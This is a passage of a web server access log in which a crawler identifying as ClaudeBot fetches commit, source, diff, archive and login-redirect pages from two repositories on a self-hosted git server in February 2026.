10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Finclude%2Fsite" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fcomponents%2FContact.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64?display=rendered" [Client 216.73.216.188] [Length 10995] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12?follow_symlink=1" [Client 216.73.216.188] [Length 11086] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3.12" [Client 216.73.216.188] [Length 11556] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Findex.html" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" [Client 216.73.216.188] [Length 9925] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg?display=source" [Client 216.73.216.188] [Length 11252] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2Fstatic%2Fjs%2Fapp.js" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fservices%2FgeminiService.ts" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fstatus.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcompare%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec..main" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.tsx?display=rendered" [Client 216.73.216.188] [Length 10906] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fcomponents%2FFooter.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/watchfiles" [Client 216.73.216.188] [Length 11537] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx?display=source" [Client 216.73.216.188] [Length 11663] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64" [Client 216.73.216.188] [Length 3] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/i18n.js?display=rendered" [Client 216.73.216.188] [Length 10951] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images" [Client 216.73.216.188] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64" [Client 216.73.216.188] [Length 9927] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3.12?display=source" [Client 216.73.216.188] [Length 11577] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.fish?display=rendered" [Client 216.73.216.188] [Length 11006] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.csh?display=rendered" [Client 216.73.216.188] [Length 11000] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3?follow_symlink=1" [Client 216.73.216.188] [Length 11089] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/.gitignore?display=source" [Client 216.73.216.188] [Length 11514] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Fcomponents%2FHeader.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python?follow_symlink=1" [Client 216.73.216.188] [Length 11079] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Finclude" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png?display=rendered" [Client 216.73.216.188] [Length 10862] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3" [Client 216.73.216.188] [Length 11554] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/vite.config.ts?display=rendered" [Client 216.73.216.188] [Length 10909] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets?display=rendered" [Client 216.73.216.188] [Length 11026] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md?display=rendered" [Client 216.73.216.188] [Length 11363] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 216.73.216.188] [Length 19885] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png?display=rendered" [Client 216.73.216.188] [Length 10863] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/uvicorn" [Client 216.73.216.188] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fcomponents%2FHero.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/2681563c08aa04fbea2862fbca273762e67c16d6.zip" [Client 216.73.216.188] [Length 28315539] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/tsconfig.json?display=rendered" [Client 216.73.216.188] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png?display=rendered" [Client 216.73.216.188] [Length 10858] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/i18n.js" [Client 216.73.216.188] [Length 10152] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Hero.tsx?display=rendered" [Client 216.73.216.188] [Length 11165] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?style=split&whitespace=show-all" [Client 216.73.216.188] [Length 90617] [Gzip 12.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip" [Client 216.73.216.188] [Length 11546] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/uvicorn" [Client 216.73.216.188] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.csh" [Client 216.73.216.188] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 10850] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png?display=rendered" [Client 216.73.216.188] [Length 10862] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/90c7377285c0e63de46467557a2f081b33097f03.bundle" [Client 216.73.216.188] [Length 15540606] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Fassets%2Fimages%2FControlRoom1.png" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Fassets%2Fimages%2FControlRoom6.png" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Fassets%2Fimages%2FControlRoom5.png" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Fassets%2Fimages%2FControlRoom4.png" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?style=unified&whitespace=ignore-all" [Client 216.73.216.188] [Length 28964] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?style=unified&whitespace=ignore-change" [Client 216.73.216.188] [Length 28960] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?style=unified&whitespace=show-all" [Client 216.73.216.188] [Length 28944] [Gzip 6.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?style=unified&whitespace=ignore-eol" [Client 216.73.216.188] [Length 28964] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?style=unified&whitespace=ignore-all" [Client 216.73.216.188] [Length 82350] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?style=unified&whitespace=ignore-change" [Client 216.73.216.188] [Length 82364] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 216.73.216.188] [Length 11097] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 216.73.216.188] [Length 11098] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:22:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] 